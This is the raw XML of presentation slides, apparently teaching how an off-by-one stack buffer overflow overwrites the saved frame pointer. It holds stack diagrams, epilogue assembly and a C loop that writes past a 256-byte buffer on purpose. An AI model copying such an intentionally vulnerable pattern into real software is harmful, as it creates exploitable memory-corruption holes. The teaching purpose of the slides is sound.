            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118222" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118223" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118224" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118225" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118226" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118227" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118228" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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18229" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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18230" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118231" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118232" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1118233" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1118227" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="2895600" y="5429251"/>
            <a:ext cx="3581400" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1118234" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1118226" idx="1"/>
            <a:endCxn id="1118223" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1343025"/>
            <a:ext cx="1588" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70100005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1118235" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="1118225" idx="1"/>
            <a:endCxn id="1118224" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6477000" y="1800225"/>
            <a:ext cx="1588" cy="3371850"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39500005"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118236" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="42862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i="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>free </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118237" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="5257800"/>
            <a:ext cx="2209800" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>main: return 0 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1118238" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="2686050"/>
            <a:ext cx="2057400" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="64000"/>
            </a:schemeClr>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36" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4102894"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228602" y="4388644"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="4731544"/>
            <a:ext cx="2362200"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a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() Epilogue</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="286882" y="2105300"/>
            <a:ext cx="3326552" cy="2086725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[256];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>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for(</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 0;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&lt;= 256;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buffer[</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80400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82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0259" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2343150"/>
            <a:ext cx="2057400" cy="3200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1120260" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="36576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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120261" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="39433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buffer[255]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120262" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="42291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buffer[254]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120263" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="49720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buffer[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120264" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="52578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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3898900" y="4591050"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1120266" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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20267" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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20268" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120269" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="33718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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120270" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="24574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argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120271" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2743200"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120272" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="2457450"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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20273" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="3371850"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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20274" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894661" y="28037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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120275" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894661" y="42896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func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120276" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="3657600"/>
            <a:ext cx="533400" cy="285750"/>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1120277" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4876800" y="3371850"/>
            <a:ext cx="1143000" cy="40005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sz="1600">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120278" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="31432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buffer[256]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120279" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overflown Stack Before Returning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2081856633"/>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2306" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Tracking The Frame Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1122307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
